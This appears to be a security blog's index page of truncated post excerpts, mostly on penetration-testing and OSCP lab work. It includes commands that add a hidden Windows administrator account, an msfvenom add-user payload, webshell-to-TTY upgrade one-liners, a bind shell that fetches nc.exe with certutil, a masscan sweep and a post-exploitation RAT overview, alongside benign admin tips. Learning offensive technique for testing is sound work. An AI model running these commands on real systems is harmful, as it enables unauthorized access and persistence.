Add user to windows using perl

Running a Windows System Command using Perl #!/usr/bin/perl system ("start C:\\admin\\adduser.bat"); contents of c:\admin\adduser.bat net user kali kali1234 /add net localgroup Administrators kali /add . . . → Read More: Add user to windows using perl

msfvenom x64 add user failing

My MSFVenom x64 Windows 10 Nightmare

I spent about an hour on this so i’ll save you some time. I tried to compile a 64 bit executable using msfvenom that would add a user as an administrator to a Windows 10 x64 Machine (version 1809)

Commands Tried msfvenom -p windows/x64/exec CMD=’cmd.exe /k "net user . . . → Read More: msfvenom x64 add user failing

Howto Install the Pupy Post Exploitation Kit on Kali Linux

Overview

Pupy is a Remote Access/Post Exploitation tool.

Here are some of my favorite features:

All-in-memory execution A windows payload that can load the entire Python interpreter from memory using a reflective DLL Execute non-interactive commands on multiple hosts at once. Reflectively migrate into other processes. Interactive shells (cmd.exe, /bin/bash, etc) can be opened . . . → Read More: Howto Install the Pupy Post Exploitation Kit on Kali Linux

List all Public IP Addresses Across All of your AWS Accounts

Gathering all EC2 Public IPs

Recently I needed to automate pulling all public IP addresses across all of the EC2 accounts I have access to. I wrote the following script to deal with that problem.

Note: Thank you to Daniel Miessler for the script to pull the IPs. My Script makes that work across . . . → Read More: List all Public IP Addresses Across All of your AWS Accounts

Upgrade dummy terminal to tty

If you have ever gotten a webshell and wanted an interactive terminal this post is for you!.

With Python python -c ‘import pty;pty.spawn(“/bin/bash”)’ Without Python script -qc /bin/bash /dev/null (inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export TERM=xterm-256color export SHELL=bash

Creating a Windows Bind Shell Using C

Creating a Windows Bind Shell Using C

I’m studying for the OSCP and needed to replace the exe file of a Windows service with a new .exe file. On reboot my goal is to have a shell as NT Authority/System

Source Code

Filename: winshell.c

This file will:

Using the native “certuil.exe”, download nc.exe.txt from the . . . → Read More: Creating a Windows Bind Shell Using C

Ingesting Okta logs in to Graylog

After many failed attempts to import Okta logs in to Graylog (using some PowerShell scripts I found online) I decided to take a different approach. Here is what my final Dashboard and view ended up looking like:

Prerequisites

To ingest Okta logs in to Graylog you will need the following:

. . . → Read More: Ingesting Okta logs in to Graylog

Disable Screen Lock on Kali Linux 2020

Problem

Kali Linux keeps locking the screen when not used for a short period of time

Solution

You need to configure “Light Locker” to stop automatically locking the session.

Steps Click the icon at the top left of the screen (Kali Linux Logo) From the popup menu, click “Settings” From the next popup menu, click . . . → Read More: Disable Screen Lock on Kali Linux 2020

How to scan top 100 ports with masscan

If you have ever wanted to scan the top 100 ports with masscan here are the instructions:

masscan -p7,9,13,21-23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157 10.11.1.0/24 –rate=1000 -e tun0 –router-ip 10.11.0.1

You will need to replace the following:

tun0 with your interface router-ip with the router of the subnet you are scanning 10.11.1.0/24 with the subnet you are scanning

I obtain . . . → Read More: How to scan top 100 ports with masscan

Parse fully qualified domain names from file

I ran in to a situation where i needed to parse all fully qualified domain names (FQDN) from bunch of files in the same directory.

Here is how to do that:

grep -R -h -Eo ‘(http|https)://[^/”]+’ . | awk -F’/’ ‘{ print $3 }’ | sort | uniq